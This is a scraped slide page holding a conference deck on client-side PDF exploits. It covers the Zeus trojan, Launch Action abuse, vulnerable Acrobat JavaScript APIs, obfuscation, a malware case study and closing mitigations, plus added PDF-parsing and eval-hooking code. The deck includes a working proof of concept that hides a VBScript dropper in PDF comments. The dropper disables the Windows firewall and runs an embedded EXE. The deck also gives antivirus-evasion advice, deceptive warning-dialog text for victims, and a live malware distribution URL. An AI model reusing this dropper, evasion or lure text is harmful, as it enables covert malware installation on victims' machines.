Mutation Testing for Task-Oriented Chatbots
Pablo Gómez Abajo
 

Recently uploaded (20)

"Scaling RAG Applications to serve millions of users", Kevin Goedecke
"Scaling RAG Applications to serve millions of users",  Kevin Goedecke"Scaling RAG Applications to serve millions of users",  Kevin Goedecke
"Scaling RAG Applications to serve millions of users", Kevin Goedecke
 
Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!
 
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
 
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdfLee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
 
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeckPoznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
 
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
 
ScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking ReplicationScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking Replication
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
 
Christine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptxChristine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptx
 
AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
 
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
 
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance PanelsNorthern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
 

Client Side Exploits using PDF

  • 10. The Reign of Zeus
    - Zeus (also known as Zbot, PRG, Wsnpoem, Gorhax and Kneber) is a Trojan horse that steals banking information by keystroke logging.
    - Found in July 2007, when it was used to steal information from the United States Department of Transportation. It became more widespread in March 2009.
    - In June 2009, the security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of companies including Bank of America, NASA, Monster, ABC, Oracle, Cisco, Amazon and BusinessWeek.
    - ZeuS is sold in the criminal underground as a kit for around $3000-$4000 and is likely the malware most used by criminals specialising in financial fraud. ZeuS has evolved over time and includes a full arsenal for information stealing.
  • 11. The Reign of Zeus
    A recent breakthrough in spreading Zeus via PDF files threatens to spread it further. The PDF file (detected as Exploit.JS.Pdfka.bui) contained an exploit for CVE-2010-0188, a buffer overflow in Reader's handling of a TIFF image carried in a form field; it is triggered when the field containing the image is accessed.
    (chart: CVE-2010-0188 exploit statistics, 2010)
  • 13. Apple iPhone / iPad / iPod Code Execution and Sandbox Bypass
    VUPEN ID: VUPEN/ADV-2010-1992
    Release date: 2010-08-03
    Caused by a memory corruption error when processing Compact Font Format (CFF) data within a PDF document. It can be exploited to execute arbitrary code by tricking a user into visiting a specially crafted web page with Mobile Safari.
  • 14. Why PDF?
    - Popularity and usability
    - Flexibility: platform independent, rich text
    - Trust level is high: a PDF is perceived as a static piece of information
    - Rich API, easy to exploit or misuse
    - Dominance of Adobe Reader gives a huge attack surface
  • 15. PDF document structure
    The general structure of a PDF file is composed of four components: header, body, cross-reference (xref) table, and trailer, as shown in figure 1.
  • 16. PDF Document Structure
    (figure 1: PDF header; body containing the objects; cross-reference table; trailer)
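As an added example (not from the deck), the following Node.js script builds a PDF out of exactly the four components named above, with byte-accurate xref offsets, and then reads it back the way a conforming reader does: locate startxref, parse the table, take /Root from the trailer and resolve `N 0 R` references through the table. The three objects in SAMPLE_OBJECTS are constructed for this example.

```javascript
// Added example, not from the slides: the four components of a PDF, written and read back.
// Offsets are byte offsets, so the file is built as a pure-ASCII string.

// Body objects for the sample; object number = array index + 1 (constructed for this example)
const SAMPLE_OBJECTS = [
  '<< /Type /Catalog /Pages 2 0 R >>',
  '<< /Type /Pages /Kids [3 0 R] /Count 1 >>',
  '<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 100] >>',
];

// header + body + xref + trailer, in that order
function buildPdf(objects) {
  let out = '%PDF-1.4\n';                       // header
  const offsets = [];
  objects.forEach((body, i) => {                // body: numbered objects
    offsets.push(out.length);
    out += `${i + 1} 0 obj\n${body}\nendobj\n`;
  });
  const xrefPos = out.length;                   // cross-reference table: one 20-byte entry per object
  out += `xref\n0 ${objects.length + 1}\n0000000000 65535 f \n`;
  for (const off of offsets) out += `${String(off).padStart(10, '0')} 00000 n \n`;
  // trailer: /Root points at the catalog, startxref at the table
  out += `trailer\n<< /Size ${objects.length + 1} /Root 1 0 R >>\nstartxref\n${xrefPos}\n%%EOF\n`;
  return out;
}

// Read it back the way a reader does: startxref -> xref table -> trailer /Root -> objects
function parsePdf(pdf) {
  const sx = /startxref\s+(\d+)\s+%%EOF\s*$/.exec(pdf);
  if (!sx) throw new Error('startxref not found');
  const xrefPos = Number(sx[1]);
  const hdr = /^xref\s+(\d+)\s+(\d+)\s*\n/.exec(pdf.slice(xrefPos));
  if (!hdr) throw new Error('startxref does not point at an xref table');
  const first = Number(hdr[1]);
  const count = Number(hdr[2]);
  let pos = xrefPos + hdr[0].length;
  const table = new Map();                      // object number -> byte offset
  for (let i = 0; i < count; i++, pos += 20) {
    const e = /^(\d{10}) (\d{5}) ([nf])/.exec(pdf.slice(pos, pos + 20));
    if (!e) throw new Error(`bad xref entry ${i}`);
    if (e[3] === 'n') table.set(first + i, Number(e[1]));
  }
  const trailer = /trailer\s*<<([\s\S]*?)>>/.exec(pdf.slice(pos));
  const root = /\/Root\s+(\d+)\s+\d+\s+R/.exec(trailer ? trailer[1] : '');
  if (!root) throw new Error('trailer has no /Root');

  // Fetch an object by number, checking that the xref offset really lands on "N G obj"
  const getObject = (num) => {
    const off = table.get(num);
    const o = off !== undefined && /^(\d+) (\d+) obj\s*([\s\S]*?)\s*endobj/.exec(pdf.slice(off));
    if (!o || Number(o[1]) !== num) throw new Error(`object ${num}: bad or missing xref offset`);
    return o[3];
  };
  // Follow an indirect reference "/Key N G R" inside object `num` (the "R" operator)
  const deref = (num, key) => {
    const r = new RegExp(`\\/${key}\\s+(\\d+)\\s+\\d+\\s+R`).exec(getObject(num));
    return r ? getObject(Number(r[1])) : null;
  };
  return { table, root: Number(root[1]), getObject, deref };
}
```

The parser checks that every xref offset lands on the object it claims to; a real reader is more forgiving and, as the antivirus-evasion slides later show, will rebuild the table itself when it is missing or wrong, which is exactly why a scanner must not trust the xref table to find all objects.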
  • 17. Launch Action
    - Launch Action API
    - Some examples
    - Evading antivirus
    - With embedded EXE
  • 18. Launch Action Vulnerability
    A launch action launches an application or opens or prints a document. The following action dictionary entries are specific to this type of action.
    ENTRIES
    - S (name, required): the type of action that this dictionary describes; shall be Launch for a launch action.
    - F (file specification; required if none of the entries Win, Mac or Unix is present): the application that shall be launched or the document that shall be opened or printed. If this entry is absent and the conforming reader does not understand any of the alternative entries, it shall do nothing.
    - Win (dictionary, optional): a dictionary containing Windows-specific launch parameters.
  • 19. Launch Action Vulnerability
    PARAMETERS of the Win dictionary
    - F (byte string, required): the file name of the application that shall be launched or the document that shall be opened or printed, in standard Windows pathname format. If the name string includes a backslash character (\), the backslash shall itself be preceded by a backslash. This value shall be a simple string; it is not a file specification.
    - P (byte string, optional): a parameter string that shall be passed to the application designated by the F entry. This entry shall be omitted if F designates a document.
  • 20. Launch Action Vulnerability
    (screenshots: a launch action opening a command prompt; a launch action opening a website)
  • 24. Launch Action Vulnerability
    The text below is what the victim sees in Reader's launch warning dialog; the attacker controls it through the launch parameters and uses it to talk the user into clicking Open:
    "Confidential Data!! If you are authorized, click on 'Open'. Check 'Do not show this message again' to avoid this dialog next time."
  • 28. Evading Antivirus by Changing the Format
    You can take any PDF data type and give it a number by wrapping it in "obj" and "endobj". Later, when you want to use that chunk of data, you reference it by number with the "R" operator. These two examples are equivalent to Acrobat:

      2 0 obj
      (Hello World)
      endobj
      3 0 obj
      << /Example 2 0 R >>
      endobj

      3 0 obj
      << /Example (Hello World) >>
      endobj
  • 29. Evading Antivirus
    What you can leave out:
    - All page data
    - All whitespace, except for the end-of-line after comments
    - The version number part of %PDF-1.1
    - The %%EOF
    - The xref table, and thus also startxref
    - Most object /Type entries
    So what is actually required?
    - %PDF-anything, but if the file is too confusing for Acrobat you need at least the first number, like %PDF-1.
    - A trailer with a /Root entry pointing to the Catalog dictionary
    - A /Pages dictionary, which can be empty as long as it is a dictionary
    - An /OpenAction if you want to launch your JavaScript when the file is opened
    - The JavaScript action itself
  • 32. POC: Launching an Embedded EXE
    Step 1: Embed the hex content of the EXE in a VBScript which writes it out to the file system and runs it.
    Step 2: Embed that VBScript in the PDF file as comments.
    Step 3: Launch cmd.exe (via the launch action) to create a second script which extracts the main VBScript from the PDF, then run them both.
  • 33. Step 1: Embed the hex content of the EXE in a VBScript
      ' Bytes of the executable, one chr() per byte (truncated here with "...")
      Dim b,bl
      Function c(d)
        c=chr(d)
      End Function
      b=Array(c(77),c(90),c(144),c(0),c(3),c(0),c(0)....,"")
      bl = 3072
      Set fso = CreateObject("Scripting.FileSystemObject")
      Set f = fso.OpenTextFile("helpme.exe", 2, True)
      For i = 0 To bl
        f.write(b(i))
      Next
      f.close()
      Set WshShell = WScript.CreateObject("WScript.Shell")
      WshShell.Run "netsh firewall set opmode disable", 0, True
      WshShell.Run "helpme.exe", 0, False
      WshShell.Run "taskkill /IM cmd.exe /F", 0, False
  • 34. Step 2: Embed the VBScript in the PDF file as comments
    The script is flattened onto one line with ";" as the statement separator, wrapped in the markers 'SS and 'EE, and placed in PDF comment lines (lines beginning with %), which Reader ignores:
      %'SS
      %Dim b,bl;Function c(d);c=chr(d);End Function;b=Array(c(77),c(90),c(144),c(0),.....,"");bl = 3072;Set fso = CreateObject("Scripting.FileSystemObject");Set f = fso.OpenTextFile("helpme.exe", 2, True);For i = 0 To bl;f.write(b(i));Next;f.close();Set WshShell = WScript.CreateObject("WScript.Shell");WshShell.Run "netsh firewall set opmode disable", 0, True;WshShell.Run "helpme.exe", 0, False;WshShell.Run "taskkill /IM cmd.exe /F", 0, False
      %'EE
      6 0 obj
      [/PDF /Text]
      endobj
  • 35. Step 3: Launch cmd.exe and create another script
    The parameter string handed to cmd.exe by the launch action (a single line, shown here broken at each &&):
      /c echo Set fso=CreateObject("Scripting.FileSystemObject") > execute.vbs
      && echo Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True) >> execute.vbs
      && echo pf=f.ReadAll >> execute.vbs
      && echo s=InStr(pf,"'SS") >> execute.vbs
      && echo e=InStr(pf,"'EE") >> execute.vbs
      && echo s=Mid(pf,s,e-s) >> execute.vbs
      && echo Set z=fso.OpenTextFile("toexecute.vbs", 2, True) >> execute.vbs
      && echo s = Replace(s,"%","") >> execute.vbs
      && echo s = Replace(s,";",vbcrlf) >> execute.vbs
      && echo z.Write(s) >> execute.vbs
      && execute.vbs && toexecute.vbs
  • 36. Generated VBScript (execute.vbs)
    It reads the PDF as text, cuts out everything between the 'SS and 'EE markers, strips the leading % of each comment line, turns the ";" separators back into line breaks and writes the result as toexecute.vbs (whose first line, 'SS, is then just a VBScript comment):
      Set fso=CreateObject("Scripting.FileSystemObject")
      Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True)
      pf=f.ReadAll
      s=InStr(pf,"'SS")
      e=InStr(pf,"'EE")
      s=Mid(pf,s,e-s)
      Set z=fso.OpenTextFile("toexecute.vbs", 2, True)
      s = Replace(s,"%","")
      s = Replace(s,";",vbcrlf)
      z.Write(s)
  • 37. AcroJS
    - AcroJS API
    - Vulnerable APIs
    - Obfuscation techniques
    - Case study
  • 38. AcroJS
    - Acrobat JavaScript is the cross-platform scripting language of the Adobe Acrobat family of products.
    - Through JavaScript extensions, the viewer application and its plug-ins expose much of their functionality to document authors, form designers and plug-in developers.
    - This functionality includes:
      - Processing forms within the document
      - Batch processing collections of PDF documents
      - Developing and maintaining online collaboration schemes
      - Communicating with local databases
      - Controlling multimedia events
  • 39. JavaScript Actions
    - A JavaScript action causes a script to be compiled and executed by the JavaScript interpreter.
    - Depending on the nature of the script, various interactive form fields in the document may update their values or change their visual appearances.
    PARAMETERS
    - /S (name, required): the type of action that this dictionary describes; must be JavaScript for a JavaScript action.
    - /JS (text string or text stream, required): a text string or text stream containing the JavaScript script to be executed.
  • 43. Vulnerable APIs
    - Collab.getIcon() [CVE-2009-0927]: stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object; a different vulnerability than CVE-2009-0658.
    - util.printf() [CVE-2008-2992] [CVE-2008-1104]:
      - Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument; a related issue to CVE-2008-1104.
      - Stack-based buffer overflow in Foxit Reader before 2.3 build 2912 allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file, related to the util.printf JavaScript function and floating point specifiers in format strings.
  • 44. Vulnerable APIs
    - getAnnots() [CVE-2009-1492]: the getAnnots Doc method in the JavaScript API in Adobe Reader and Acrobat 9.1, 8.1.4, 7.1.1 and earlier allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that contains an annotation and has an OpenAction entry with JavaScript code that calls this method with crafted integer arguments.
    - customDictionaryOpen() [CVE-2009-1493]: the customDictionaryOpen spell method in the JavaScript API in Adobe Reader 9.1, 8.1.4, 7.1.1 and earlier on Linux and UNIX allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that triggers a call to this method with a long string in the second argument.
  • 45. Vulnerable APIs
    - Doc.media.newPlayer [CVE-2009-4324]: use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3 and 8.x before 8.2 on Windows and Mac OS X allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009.
    - Collab.collectEmailInfo [CVE-2007-5659]: multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. NOTE: this issue might be subsumed by CVE-2008-0655.
  • 46. Obfuscation Techniques
    Why?
    - To make analysis more difficult
    - To avoid detection by virus scanners
    How?
    - JavaScript obfuscation
    - PDF obfuscation (filters)
  • 47. JavaScript Obfuscations: Unlearn Coding Ethics
  • 48. Distorting format
    Normal code:
      function execute(data, time) {
        Timelag=5000;
        if (time > Timelag) {
          // some code
        }
      }
      function overflow(hex, loop) {
        for (i=0;i<loop;i++) {
          hex = hex + hex;
        }
      }
    Obfuscated code (the same function with every line break and indentation removed):
      function overflow(hex, loop){for (i=0;i<loop;i++){hex = hex + hex;}}
  • 49. Obfuscating Identifiers
    Normal code: the two functions of slide 48.
    Obfuscated code (every identifier replaced by a confusable name):
      function aeiou(lIlIIlI, O0OOOO0OO000OO) {
        WWMWMWMWMWMW=5000;
        if (O0OOOO0OO000OO > WWMWMWMWMWMW) {
          // some code
        }
      }
      function aimpq(xxwmnnx, pqrtxw) {
        for (dqweaa=0; dqweaa < pqrtxw; dqweaa++) {
          xxwmnnx = xxwmnnx + xxwmnnx;
        }
      }
  • 50. Obfuscating Identifiers: Even Worse
    Identifiers that differ only in their number of underscore characters:
      function _____(____,__________) {
        ______________=5000;
        if (__________>______________) {
          // some code
        }
      }
      function ___(_______, ______) {
        for(________________=0; ________________<______; ________________++) {
          _______ = _______ + _______;
        }
      }
  • 51. Obfuscating Identifiers: Even Worse
    The same two functions with the formatting distortion of slide 48 applied as well (the "// some code" line comment has to go first, or it would swallow the closing braces):
      function _____(____,__________){______________=5000;if (__________>______________){}}function ___(_______, ______){for(________________=0; ________________<______; ________________++){_______ = _______ + _______;}}
  • 52. Chain of Eval
    Normal code:
      app.alert("c0c0n");
    Obfuscated code (the payload only reaches app.alert after three nested evals, and eval itself is reached through a string):
      func="eval";
      one='app.alert("c0c0n")';
      two='eval(one)';
      three='eval(two)';
      eval(func)(three);
  • 53. Splitting JavaScript
    Normal code:
      app.alert("hello world");
    Obfuscated code (the call is split into fragments held in variables and reassembled at run time):
      Rt=");";
      Td='ert("hel';
      Ab="ap";
      Qw='ld"';
      Kg="p.al";
      Gh="lo wor";
      eval("hh=Ab+Kg+Td+Gh+Qw+Rt");
      eval(hh);
  • 54. Callee Trick
    The function reads its own source text and uses it as the key to decrypt code or data, so any edit to the function (reformatting, renaming, inserting a logging call) changes the key and breaks the decryption:
      function decrypt(cypher) {
        var key = arguments.callee.toString();
        var plain = "";
        for (var i = 0; i < cypher.length; i++) {
          plain += String.fromCharCode(key.charCodeAt(i % key.length) ^ cypher.charCodeAt(i));
        }
        return plain;
      }
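The standard way to get past the eval-chain and string-splitting tricks is not to read the script but to run it with eval instrumented. The block below is an added example (not from the deck and not a tool the authors used) for Node.js: it stubs Acrobat's app.alert and util.printf, replaces the global eval with a hook that records every string it is asked to execute, and runs the sample as sloppy-mode global code so that bare assignments like Rt=");" become globals exactly as they would inside Reader. The two samples are constructed in the style of slides 52 and 53.

```javascript
// Added example, not from the slides: an instrumented eval() that unpacks the
// "chain of eval" and "splitting" tricks without a JavaScript-aware PDF parser.
// Acrobat's app and util objects are stubbed, and every string that reaches eval
// is recorded, which is the approach Malzilla-style deobfuscators take.

// Constructed samples in the style of slides 52 and 53 (not the deck's exact text)
const SPLIT_SAMPLE =
  'Rt=");"; Td=\'ert("hel\'; Ab="ap"; Qw=\'ld"\'; Kg="p.al"; Gh="lo wor"; ' +
  'eval("hh=Ab+Kg+Td+Gh+Qw+Rt"); eval(hh);';
const CHAIN_SAMPLE =
  'func="eval"; one=\'app.alert("c0c0n")\'; two=\'eval(one)\'; three=\'eval(two)\'; eval(func)(three);';

function unpackAcroJs(script) {
  const log = [];
  const realEval = globalThis.eval;        // kept in a variable: calling it is an indirect eval (global scope)
  const hookedEval = (code) => {
    if (typeof code === 'string') log.push({ kind: 'eval', value: code });
    return realEval(code);
  };
  const saved = { eval: globalThis.eval, app: globalThis.app, util: globalThis.util };
  // Replacing the global eval turns every eval() in the sample, nested ones included, into a call to the hook
  globalThis.eval = hookedEval;
  globalThis.app = { alert: (msg) => { log.push({ kind: 'app.alert', value: String(msg) }); return 1; } };
  globalThis.util = { printf: (...a) => { log.push({ kind: 'util.printf', value: a.map(String).join(' ') }); return ''; } };
  try {
    new Function(script)();                // sloppy-mode global code: bare assignments become globals, as in Acrobat
  } catch (err) {
    log.push({ kind: 'error', value: String(err.message) });
  } finally {
    Object.assign(globalThis, saved);      // restore eval/app/util even if the sample threw
  }
  return log;
}

// The strings handed to app.alert are the payload the analyst wants
function alerts(log) {
  return log.filter((e) => e.kind === 'app.alert').map((e) => e.value);
}
```

For a real sample, feed unpackAcroJs the /JS string after its stream has been inflated. Two caveats: this executes attacker code, so it belongs in a throwaway VM, and the callee trick of slide 54 still works here because the sample's own function text is never modified; what defeats the callee trick is the analyst editing the function, not the hook.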
  • 55. PDF obfuscations
    Using filters on streams. The most common encodings:
    - ASCIIHexDecode
    - ASCII85Decode
    - LZWDecode
    - FlateDecode
    - RunLengthDecode
  • 56. Case study. Malware found via www.malwaredomainlist.com. File link: www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on. Added on 29th July 2010.
  • 57. VirusTotal report: 5/42 (11.90%) detections.
  • 60. STEP 2: Behavioral analysis. Environment: a VM image with Filemon, Process Monitor, Regmon and TCPView. Results: the process 'AcroRD32.exe' was trying to connect to the remote site http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on
  • 66. Replacing with meaningful identifiers and removing unnecessary comments
  • 70. Road Ahead • Mitigations • Adobe's security measures • Future exploit methods
  • 71. How can we protect ourselves • Enable automatic updates: it sounds simple, but you will need to turn it on in the software settings to make it happen by default. • Disable PDF browser integration: most browsers will open PDFs without asking. An infected PDF will deliver its payload without warning, hiding in the background. • Always install the latest patch/update, even for older Adobe product versions. • Disable JavaScript. • Uncheck 'Allow opening of non-PDF file attachments with external applications' to prevent the launch action vulnerability. • PDF alternatives such as Foxit are worthwhile, as long as auto updates are turned on; however, alternative programs are just as vulnerable to malware as they gain popularity.
  • 72. Road Ahead. Focus less on JavaScript exploits: attackers are focusing more on embedded objects inside PDF, i.e. Flash. Adobe to introduce sandboxing to limit Reader exploits.
  • 74. Tools used: Malzilla; the Mozilla add-on JavaScript Deobfuscator by Wladimir Palant; VMware Player; Sysinternals tools (Process Monitor, Filemon, Regmon, TCPView); WinHex; HexEdit.
  • 75. References: www.malwaredomainlist.com; www.adobe.com/; www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on; www.blog.didierstevens.com; www.jsbeautifier.org; http://research.globalthoughtz.com; http://www.zdnet.com/; http://www.scansafe.com/; http://www.computerworld.com/s/article/9176117/; http://www.darkreading.com/; http://www.virustotal.com/; http://recon.cx/; http://www.blog.zynamics.com
  • 76. References (continued): http://www.marketwire.com/; http://www.symantec.com/; http://www.securelist.com/en/analysis; http://contagiodump.blogspot.com/; http://www.f-secure.com/; http://www.securelist.com/; http://www.secureworks.com/; http://en.wikipedia.org/; http://www.malwaredomainlist.com/; http://blogs.adobe.com/; http://blog.fireeye.com/; http://intrepidusgroup.com/; http://www.vupen.com

Editor's Notes

  1. THE ADOBE PORTABLE DOCUMENT FORMAT (PDF) is a file format for representing documents in a manner independent of the application software, hardware, and operating system used to create them and of the output device on which they are to be displayed or printed. A document's pages (and other visual elements) may contain any combination of text, graphics, and images. A page's appearance is described by a PDF content stream, which contains a sequence of graphics objects to be painted on the page. This appearance is fully specified; all layout and formatting decisions have already been made by the application generating the content stream. In addition to describing the static appearance of pages, a PDF document may contain interactive elements that are possible only in an electronic representation. PDF supports annotations of many kinds for such things as text notes, hypertext links, markup, file attachments, sounds, and movies. A document can define its own user interface; keyboard and mouse input can trigger actions that are specified by PDF objects. The document can contain interactive form fields to be filled in by the user, and can export the values of these fields to or import them from other applications.
  2. Distorting format – removing newlines and spaces. Not much of a pain to deobfuscate (e.g. jsbeautifier.org).
  3. Name obfuscation – variable names and function names are renamed. One of the most common obfuscation techniques.
  4. JavaScript code can execute JavaScript code held in strings through eval. • Often used to hide later code stages, which are decrypted on the fly. • Common way to extract the argument: replace eval with a printing function.
  5. Not specific to Adobe Reader. • Frequently used by JavaScript code in other contexts. • The function accesses its own source and uses it as a key to decrypt code or data. • Add a single whitespace character and decryption fails.
  6. Online decoders are available to decode them.
  7. We cannot hit the PDF file link directly, so we chose wget to download the file contents.
  8. JavaScript found in object 11 0, encoded with ASCII85 encoding. First obfuscation – filters.
  9. Second obfuscation – distorted formatting.
  10. Third obfuscation – obfuscated identifiers and unnecessary comments.
  11. Fourth obfuscation – eval chains.
  12. Fifth obfuscation – JavaScript splitting.